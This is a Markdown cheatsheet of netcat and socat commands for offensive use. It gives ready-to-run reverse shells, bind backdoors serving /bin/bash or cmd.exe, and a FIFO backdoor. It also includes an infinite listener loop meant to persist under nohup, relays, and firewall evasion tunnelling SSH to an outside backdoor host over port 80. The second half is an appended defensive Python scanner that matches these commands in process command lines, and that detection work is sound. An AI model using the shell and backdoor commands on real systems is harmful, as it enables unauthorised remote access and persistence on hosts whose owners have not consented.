# Netcat & Socat

## Netcat

### Basics

Connect to a socket on host `192.168.1.1` on TCP port 81

```bash
nc 192.168.1.1 81
```

Listen on the local machine for inbound TCP connections on port 81

```bash
nc -nvlp 81
```

Reverse shell sent to host `10.0.0.2` over TCP port 53

```bash
nc 10.0.0.2 53 -e /bin/bash
```

Backdoor listening on TCP 80 set to execute cmd.exe when connected

```bash
nc -nvlp 80 -e cmd.exe
```

### More Fancy

Attempt to connect to each port from 10-90 on `10.0.0.1`, don't resolve any names `-n`, don't send any data `-z`, and only wait 1 second for a connection `-w1`

```bash
nc -nvzw1 10.0.0.1 10-90
```

Netcat stops listening after the connection drops or is terminated, which can make getting another shell back annoying. Placing `nc` in an infinite bash loop is an easy way to work around this; run it under `nohup` as well so it outlives the session.

```bash
while true; do echo "started"; nc -l -p 1234 -e /bin/sh; done
```

Netcat relay that forwards everything received on local TCP 4321 to `10.0.0.1` on TCP 8123. Note that this plain pipe is one-way: replies from `10.0.0.1` are not sent back to the client; the named-pipe form in the firewall evasion section handles both directions.

```bash
nc -l -p 4321 | nc 10.0.0.1 8123
```

Create a `netcat` backdoor on a build without `-e` support. This creates a named pipe (FIFO) that funnels data between `bash` and `nc`.

```bash
mknod backpipe p
/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe
```

### Firewall Evasion

If a specific port is blocked at the firewall, netcat can relay traffic through a port that is allowed. The named pipe carries the replies back from the inner `nc`, so the relay works in both directions.

```bash
mknod mypipe p
nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe
ssh backdoor@m4lwhere.org -p 80    # Attacker command to connect to ssh relayed through port 80
```

## Socat

socat is a more capable alternative to netcat; it supports SSL/TLS and forking a new handler for each connection.

```bash
# Below command listens locally on 8080, forwards connections to 10.0.0.1:80
socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80

# Listen with SSL and send to stdout (verify=0 disables peer certificate checking)
socat openssl-listen:8443,reuseaddr,cert=ssl.pem,verify=0,fork stdio
```
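As an added defender-side example (not part of the original cheatsheet), the following Python scans process command lines, as an EDR or auditd would record them, for the netcat and socat patterns shown above: `-e` shells, FIFO-backed shells, nc-to-nc relays, and forking socat listeners. The sample command lines are constructed, and the rule names, `classify` and `scan` are this example's own.

```python
import re

# Constructed sample process command lines, in the form an auditd EXECVE record or EDR
# telemetry would show them; made up for this example and mirroring the commands above.
SAMPLE_CMDLINES = [
    "nc 10.0.0.2 53 -e /bin/bash",
    "nc -nvlp 80 -e cmd.exe",
    "while true; do nc -l -p 1234 -e /bin/sh; done",
    "nc -l -p 4321 | nc 10.0.0.1 8123",
    "/bin/bash 0<backpipe | nc -l -p 8080 1>backpipe",
    "nc -lp 80 < mypipe | nc 127.0.0.1 22 > mypipe",
    "socat -v tcp4-listen:8080,reuseaddr,fork TCP4:10.0.0.1:80",
    "nc -nvzw1 10.0.0.1 10-90",  # port sweep: no listener, no shell, not flagged
    "grep -r nc /etc/hosts",      # 'nc' as an argument must not match
]

# (rule name, severity, pattern); \bnc\b stops 'sync' or 'nc' inside a path from matching.
RULES = [
    # -e hands a shell (or cmd.exe) to whatever connects to the socket
    ("nc_exec_shell", "high", re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-e\s+\S*(sh|cmd\.exe)\b")),
    # shell wired to nc through a FIFO redirect, the mknod/backpipe trick
    ("nc_fifo_shell", "high", re.compile(r"\b(ba)?sh\b.*\|\s*nc\b.*>\s*\S+|\bnc\b[^|]*<\s*\S+\s*\|\s*nc\b")),
    # nc piped into nc: a relay / port-forwarding hop
    ("nc_relay", "medium", re.compile(r"\bnc\b[^|]*\|\s*nc\b")),
    # socat listener with fork: persistent forwarder or TLS-wrapped listener
    ("socat_forwarder", "medium", re.compile(r"\bsocat\b.*(tcp4?-listen|openssl-listen):\d+.*\bfork\b", re.I)),
    # any nc listen flag (-l inside a flag cluster): noisy alone, useful as context
    ("nc_listener", "low", re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-[a-z]*l[a-z]*\b")),
]
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3}

def classify(cmdline):
    """Return (highest severity, matched rule names); ('none', []) when nothing matches."""
    hits = [(sev, name) for name, sev, pat in RULES if pat.search(cmdline)]
    if not hits:
        return "none", []
    top = max(hits, key=lambda h: SEVERITY_RANK[h[0]])[0]
    return top, [name for _, name in hits]

def scan(cmdlines):
    """Keep only the command lines that trip at least one rule."""
    out = []
    for line in cmdlines:
        sev, rules = classify(line)
        if rules:
            out.append((line, sev, rules))
    return out

if __name__ == "__main__":
    for line, sev, rules in scan(SAMPLE_CMDLINES):
        print(f"[{sev:<6}] {', '.join(rules):<28} {line}")
```

The `nc_listener` rule alone fires on legitimate admin use, so treat it as context for the higher-severity rules rather than an alert by itself.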
